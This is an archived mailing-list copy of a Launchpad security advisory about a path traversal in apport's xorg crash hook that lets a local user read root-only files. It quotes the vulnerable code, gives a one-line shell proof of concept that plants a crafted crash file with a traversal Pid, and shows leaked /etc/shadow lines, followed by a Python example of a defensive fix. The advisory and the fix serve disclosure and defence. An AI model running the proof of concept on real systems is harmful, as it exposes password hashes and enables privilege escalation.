openjdk team mailing list archive
Message #14205
[Bug 1933832] Re: Path traversal leads to arbitrary file read
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of OpenJDK,
which is subscribed to openjdk-8 in Ubuntu.
https://bugs.launchpad.net/bugs/1933832
Title:
Path traversal leads to arbitrary file read
Status in apport package in Ubuntu:
Fix Released
Status in openjdk-13 package in Ubuntu:
New
Status in openjdk-14 package in Ubuntu:
New
Status in openjdk-15 package in Ubuntu:
New
Status in openjdk-16 package in Ubuntu:
New
Status in openjdk-17 package in Ubuntu:
New
Status in openjdk-18 package in Ubuntu:
New
Status in openjdk-8 package in Ubuntu:
New
Status in xorg package in Ubuntu:
New
Bug description:
While reiterating the issues reported in https://bugs.launchpad.net/bugs/1917904, Stephen Röttger (@_tsuro) mentioned that the second issue "Arbitrary file read in package-hooks/source_xorg.py (Info)" might additionally contain a path traversal vulnerability. This was confirmed by developing a PoC that enables a user to read arbitrary files in the context of the root user, leading to elevation of privileges. Exploiting this issue requires that automatic crash reporting is enabled.
The following excerpt of the file `package-hooks/source_xorg.py` shows the vulnerable code:
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
    compiz_pid = 0
    pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"]) # [0]
    if pid_line:
        compiz_pid = pid_line.groups()[0]
    compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid # [1]
    attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
While in [0] the `pid_line` is extracted, this value (if successfully matched) is appended to the file path resulting in `compiz_state_file` [1], which is subsequently attached to the crash file.
Using a `Pid` such as `JRN/../../../../etc/shadow` therefore results in the file `/etc/shadow` being attached (after creating the directory `/tmp/compiz_internal_stateJRN`).
The following POC (tested on 20.04/21.04 Desktop) exploits this issue to read the file `/etc/shadow`:
mkdir /tmp/compiz_internal_stateJRN/;pid=$'\tJRN/../../../etc/shadow';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:$pid
Uid:$pid
EOF
When reading the crash file (after `whoopsie-upload-all` ran), the contents of the file `/etc/shadow` are indeed attached:
grep -A3 compiz_internal /var/crash/poc.crash
compiz_internal_states:
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.
Best regards,
Maik
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832/+subscriptions
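A defensive counterpart to the excerpt above, added here as example code and not apport's own fix: the Pid is accepted only if it is purely numeric, and the constructed path is canonicalised and checked to remain under the state directory before it would be attached. The constants, function names and the sample ProcStatus blobs are assumptions constructed for this example.

```python
import os
import re

# Assumed for this example: the directory the hook is meant to stay inside
# and the file-name prefix used in the vulnerable excerpt.
STATE_DIR = "/tmp"
STATE_PREFIX = "compiz_internal_state"


def pid_from_proc_status(proc_status):
    """Return the numeric Pid from a /proc/<pid>/status blob, or None.

    The vulnerable hook captured "(.*)" after "Pid:\t", so any string,
    including one with "/" and "..", became part of the path. Restricting
    the capture to digits rejects a value like "JRN/../../../etc/shadow".
    """
    m = re.search(r"^Pid:\t([0-9]+)$", proc_status, re.MULTILINE)
    return int(m.group(1)) if m else None


def is_inside(base, path):
    """True if the canonicalised path lies within the canonicalised base."""
    base = os.path.realpath(base)
    path = os.path.realpath(path)
    return os.path.commonpath([base, path]) == base


def compiz_state_path(proc_status):
    """Build the state-file path, or None if the input is untrustworthy.

    The containment check is redundant with the digit-only Pid, but it is
    kept as defence in depth in case the path format is edited later.
    """
    pid = pid_from_proc_status(proc_status)
    if pid is None:
        return None
    candidate = os.path.join(STATE_DIR, "%s%d" % (STATE_PREFIX, pid))
    return os.path.realpath(candidate) if is_inside(STATE_DIR, candidate) else None


# Constructed sample inputs: a benign ProcStatus and one shaped like the PoC.
BENIGN = "Name:\tcompiz\nPid:\t1234\nUid:\t1000\n"
TRAVERSAL = "Pid:\tJRN/../../../etc/shadow\nUid:\tJRN/../../../etc/shadow\n"

if __name__ == "__main__":
    print(compiz_state_path(BENIGN))     # canonical /tmp/compiz_internal_state1234
    print(compiz_state_path(TRAVERSAL))  # None
```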